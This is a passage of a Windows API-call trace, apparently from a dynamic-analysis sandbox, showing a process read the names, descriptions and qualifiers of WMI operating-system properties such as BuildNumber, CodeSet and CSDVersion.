	[0111.109] IWbemClassObject:Get (in: This=0x2ad20693940, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.109] IWbemClassObject:Get (in: This=0x2ad20693940, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BootDevice", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.109] GetCurrentThreadId () returned 0x6bc
	[0111.109] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.109] IWbemClassObject:Get (in: This=0x2ad20693940, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.109] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.109] lstrlenA (lpString="") returned 0
	[0111.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087bd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.109] SysStringLen (param_1="The BootDevice property indicates the name of the disk drive from which the Win32 operating system boots. /nExample: \\\\Device\\Harddisk0.") returned 0x88
	[0111.109] SysStringLen (param_1="") returned 0x0
	[0111.109] GetCurrentThreadId () returned 0x6bc
	[0111.109] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.109] IWbemClassObject:Get (in: This=0x2ad20693940, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.109] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.110] IUnknown:Release (This=0x2ad20693940) returned 0x1
	[0111.110] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.110] IWbemClassObject:Get (in: This=0x2ad20693eb0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20650398, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.110] IWbemClassObject:Get (in: This=0x2ad20693eb0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652fb8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.110] GetCurrentThreadId () returned 0x6bc
	[0111.110] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.110] IWbemClassObject:Get (in: This=0x2ad20693eb0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildNumber property indicates the build number of the operating system.  It can be used for more precise versioning information than product release version numbers/nExample: 1381", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.110] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.110] lstrlenA (lpString="") returned 0
	[0111.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087bd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.110] SysStringLen (param_1="The BuildNumber property indicates the build number of the operating system.  It can be used for more precise versioning information than product release version numbers/nExample: 1381") returned 0xb8
	[0111.110] SysStringLen (param_1="") returned 0x0
	[0111.110] GetCurrentThreadId () returned 0x6bc
	[0111.110] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.111] IWbemClassObject:Get (in: This=0x2ad20693eb0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.111] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.112] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.112] SysStringLen (param_1="BootDevice") returned 0xa
	[0111.112] SysStringLen (param_1="BootDevice") returned 0xa
	[0111.112] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.112] IUnknown:Release (This=0x2ad20693eb0) returned 0x1
	[0111.112] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.113] IWbemClassObject:Get (in: This=0x2ad206943e0, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652c58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.113] IWbemClassObject:Get (in: This=0x2ad206943e0, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652bc8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.113] GetCurrentThreadId () returned 0x6bc
	[0111.113] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.113] IWbemClassObject:Get (in: This=0x2ad206943e0, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.113] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.114] lstrlenA (lpString="") returned 0
	[0111.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087bd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.114] SysStringLen (param_1="The BuildType property indicates the type of build used for the operating system. Examples are retail build and checked build.") returned 0x7e
	[0111.114] SysStringLen (param_1="") returned 0x0
	[0111.114] GetCurrentThreadId () returned 0x6bc
	[0111.114] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.114] IWbemClassObject:Get (in: This=0x2ad206943e0, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.114] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.115] SysStringLen (param_1="BuildType") returned 0x9
	[0111.115] SysStringLen (param_1="BootDevice") returned 0xa
	[0111.115] SysStringLen (param_1="BuildType") returned 0x9
	[0111.115] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.115] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.115] SysStringLen (param_1="BuildType") returned 0x9
	[0111.116] IUnknown:Release (This=0x2ad206943e0) returned 0x1
	[0111.116] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.116] IWbemClassObject:Get (in: This=0x2ad20694d70, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652f28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.116] IWbemClassObject:Get (in: This=0x2ad20694d70, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652f58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.116] GetCurrentThreadId () returned 0x6bc
	[0111.116] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.116] IWbemClassObject:Get (in: This=0x2ad20694d70, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.117] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.117] lstrlenA (lpString="") returned 0
	[0111.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087bd40, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.117] SysStringLen (param_1="The CodeSet property indicates the code page value used by the operating system. A code page contains a character table used by the operating system to translate strings for different languages. The American National Standards Institute (ANSI) lists values that represent defined code pages. If the operating system does not use an ANSI code page, this member will be set to 0. The CodeSet string can use up to six characters to define the code page value./nExample: 1255.") returned 0x1d8
	[0111.117] SysStringLen (param_1="") returned 0x0
	[0111.117] GetCurrentThreadId () returned 0x6bc
	[0111.118] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.118] IWbemClassObject:Get (in: This=0x2ad20694d70, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b180*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633060, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.118] SafeArrayGetLBound (in: psa=0x2ad2064b180, nDim=0x1, plLbound=0xd7edd8f164 | out: plLbound=0xd7edd8f164) returned 0x0
	[0111.118] SafeArrayGetUBound (in: psa=0x2ad2064b180, nDim=0x1, plUbound=0xd7edd8f168 | out: plUbound=0xd7edd8f168) returned 0x0
	[0111.118] SafeArrayGetElement (in: psa=0x2ad2064b180, rgIndices=0xd7edd8f140, pv=0xd7edd8f138 | out: pv=0xd7edd8f138) returned 0x0
	[0111.118] IWbemClassObject:Get (in: This=0x2ad206a6830, wszName="Name", lFlags=0, pVal=0xd7edd8f180*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f180*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.119] IWbemClassObject:Get (in: This=0x2ad206a6830, wszName="QualifierValue", lFlags=0, pVal=0xd7edd8f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1b8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad2064b240*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad20633180, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.119] SafeArrayGetLBound (in: psa=0x2ad2064b240, nDim=0x1, plLbound=0xd7edd8f15c | out: plLbound=0xd7edd8f15c) returned 0x0
	[0111.119] SafeArrayGetUBound (in: psa=0x2ad2064b240, nDim=0x1, plUbound=0xd7edd8f158 | out: plUbound=0xd7edd8f158) returned 0x0
	[0111.119] lstrlenW (lpString="CIMTYPE") returned 7
	[0111.119] lstrlenW (lpString="MaxLen") returned 6
	[0111.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0111.119] lstrlenW (lpString="read") returned 4
	[0111.119] lstrlenW (lpString="MaxLen") returned 6
	[0111.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0111.119] lstrlenW (lpString="write") returned 5
	[0111.119] lstrlenW (lpString="MaxLen") returned 6
	[0111.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0111.119] lstrlenW (lpString="In") returned 2
	[0111.119] lstrlenW (lpString="MaxLen") returned 6
	[0111.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0111.119] lstrlenW (lpString="Out") returned 3
	[0111.119] lstrlenW (lpString="MaxLen") returned 6
	[0111.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0111.119] SafeArrayGetElement (in: psa=0x2ad2064b240, rgIndices=0xd7edd8f130, pv=0xd7edd8f150 | out: pv=0xd7edd8f150) returned 0x0
	[0111.120] IUnknown:Release (This=0x2ad206a6830) returned 0x1
	[0111.120] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.121] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.121] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.121] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.121] SysStringLen (param_1="BuildType") returned 0x9
	[0111.121] SysStringLen (param_1="BuildType") returned 0x9
	[0111.121] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.121] IUnknown:Release (This=0x2ad20694d70) returned 0x1
	[0111.121] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.122] IWbemClassObject:Get (in: This=0x2ad20695370, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652c88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.122] IWbemClassObject:Get (in: This=0x2ad20695370, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652f88, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.122] GetCurrentThreadId () returned 0x6bc
	[0111.122] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.122] IWbemClassObject:Get (in: This=0x2ad20695370, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.122] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.124] lstrlenA (lpString="") returned 0
	[0111.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c0e0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.124] SysStringLen (param_1="The CountryCode property indicates the code for the country/regionused by the operating system. Values are based on international phone dialing prefixes (also referred to as IBM country/region codes). The CountryCode string can use up to six characters to define the country/region code value./nExample: 1 for the United States)") returned 0x148
	[0111.124] SysStringLen (param_1="") returned 0x0
	[0111.124] GetCurrentThreadId () returned 0x6bc
	[0111.124] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.124] IWbemClassObject:Get (in: This=0x2ad20695370, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.124] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.125] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.125] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.125] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.125] SysStringLen (param_1="BuildType") returned 0x9
	[0111.125] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.125] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.125] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.125] SysStringLen (param_1="CountryCode") returned 0xb
	[0111.125] IUnknown:Release (This=0x2ad20695370) returned 0x1
	[0111.125] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.126] IWbemClassObject:Get (in: This=0x2ad20695990, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652d48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.126] IWbemClassObject:Get (in: This=0x2ad20695990, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20653048, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.126] GetCurrentThreadId () returned 0x6bc
	[0111.126] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.126] IWbemClassObject:Get (in: This=0x2ad20695990, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.127] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.127] lstrlenA (lpString="") returned 0
	[0111.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c230, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.127] SysStringLen (param_1="The CSDVersion property contains a null-terminated string, that indicates the latest Service Pack installed on the computer system. If no Service Pack is installed, the string is NULL. For computer systems running Windows 95, this property contains a null-terminated string that provides arbitrary additional information about the operating system./nExample: Service Pack 3.") returned 0x176
	[0111.127] SysStringLen (param_1="") returned 0x0
	[0111.128] GetCurrentThreadId () returned 0x6bc
	[0111.128] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.128] IWbemClassObject:Get (in: This=0x2ad20695990, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.128] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.129] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.129] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.129] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.129] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.129] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.129] SysStringLen (param_1="BuildType") returned 0x9
	[0111.129] SysStringLen (param_1="BuildType") returned 0x9
	[0111.129] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.129] IUnknown:Release (This=0x2ad20695990) returned 0x1
	[0111.130] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.130] IWbemClassObject:Get (in: This=0x2ad20695e00, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206530a8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.130] IWbemClassObject:Get (in: This=0x2ad20695e00, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652fe8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.130] GetCurrentThreadId () returned 0x6bc
	[0111.130] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
	[0111.131] IWbemClassObject:Get (in: This=0x2ad20695e00, wszName="Description", lFlags=0, pVal=0xd7edd8f328*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f328*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.131] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.131] lstrlenA (lpString="") returned 0
	[0111.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x2ad2087c160, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0111.131] GetCurrentThreadId () returned 0x6bc
	[0111.131] ??0CHString@@QEAA@XZ () returned 0xd7edd8f128
	[0111.132] IWbemClassObject:Get (in: This=0x2ad20695e00, wszName="Qualifiers", lFlags=0, pVal=0xd7edd8f1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f1a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.132] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.133] SysStringLen (param_1="CSName") returned 0x6
	[0111.133] SysStringLen (param_1="BuildNumber") returned 0xb
	[0111.133] SysStringLen (param_1="CSName") returned 0x6
	[0111.133] SysStringLen (param_1="CodeSet") returned 0x7
	[0111.133] SysStringLen (param_1="CSName") returned 0x6
	[0111.133] SysStringLen (param_1="BuildType") returned 0x9
	[0111.133] SysStringLen (param_1="CSName") returned 0x6
	[0111.133] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.133] SysStringLen (param_1="CSDVersion") returned 0xa
	[0111.133] SysStringLen (param_1="CSName") returned 0x6
	[0111.133] IUnknown:Release (This=0x2ad20695e00) returned 0x1
	[0111.133] SafeArrayGetElement (in: psa=0x2ad2064ab80, rgIndices=0xd7edd8f468, pv=0xd7edd8f400 | out: pv=0xd7edd8f400) returned 0x0
	[0111.134] IWbemClassObject:Get (in: This=0x2ad20696350, wszName="Name", lFlags=0, pVal=0xd7edd8f4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad20652cb8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f4f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.134] IWbemClassObject:Get (in: This=0x2ad20696350, wszName="Derivation", lFlags=0, pVal=0xd7edd8f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad206530d8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.135] GetCurrentThreadId () returned 0x6bc
	[0111.135] ??0CHString@@QEAA@XZ () returned 0xd7edd8f318
